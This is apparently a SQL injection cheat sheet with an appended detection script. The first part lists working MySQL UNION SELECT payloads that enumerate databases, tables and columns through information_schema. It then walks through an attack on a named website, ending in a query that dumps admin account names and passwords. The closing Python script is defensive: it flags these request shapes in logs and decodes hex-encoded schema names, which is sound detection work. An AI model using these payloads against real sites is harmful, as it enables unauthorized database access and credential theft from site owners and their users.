Enumerate databases
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*

Enumerate tables
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=<hex value of the database name>/**/limit/**/1,1

Enumerate columns
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=<hex value of the table name>/**/limit/**/1,1

MySQL 5 advanced injection method: dumping tables
Example:

1. Dump tables
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574 is the hex encoding of the database name yd_teamnet)
Stepping through the results this way, the admin_user table appeared at the 4th one.

2. Dump columns
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*

3. Dump passwords
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
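
An added example (not part of the original post): a log-triage check for the request shapes shown above. It undoes the URL encoding and the /**/ comment padding, flags query strings that combine UNION SELECT with an information_schema catalog table, and decodes hex literals so a responder can see which schema or table name was queried. The paths, function names and sample lines are constructed for illustration; the hex literals are the ones from the post.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample request targets (hypothetical paths), modelled on the
# request shapes shown above; the hex literals are the ones from the post.
SAMPLE_REQUESTS = [
    "/item.php?id=13240",
    "/item.php?id=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5"
    "/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA="
    "0x79645F7465616D6E6574/**/limit/**/0,1/*",
    "/item.php?id=-1%20UnIoN%2F%2A%2A%2FSeLeCt%201,COLUMN_NAME,3%20from%20"
    "information_schema.COLUMNS%20where%20TABLE_NAME=0x61646D696E5F75736572",
    "/search.php?q=credit+union+select+committee",
]

RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "information_schema": re.compile(r"\binformation_schema\s*\.\s*(?:schemata|tables|columns)\b"),
    "hex_literal": re.compile(r"\b0x(?:[0-9a-f]{2}){2,}\b"),
}

def normalize(query):
    """URL-decode, turn /*...*/ (and an unterminated trailing /*) into a space, lowercase."""
    text = unquote_plus(query)
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    text = re.sub(r"/\*.*$", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()

def inspect(request):
    """Return (matched rule names, decoded hex literals) for one request target."""
    text = normalize(urlsplit(request).query)
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    decoded = [bytes.fromhex(m.group(0)[2:]).decode("latin-1")
               for m in RULES["hex_literal"].finditer(text)]
    return hits, decoded

def is_suspicious(request):
    hits, _ = inspect(request)
    # Require the UNION SELECT shape plus a catalog reference to avoid flagging prose.
    return "union_select" in hits and "information_schema" in hits

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(is_suspicious(req), *inspect(req))
```

The last sample line matches the UNION SELECT pattern alone and is not flagged, which is why the check requires the catalog reference as well.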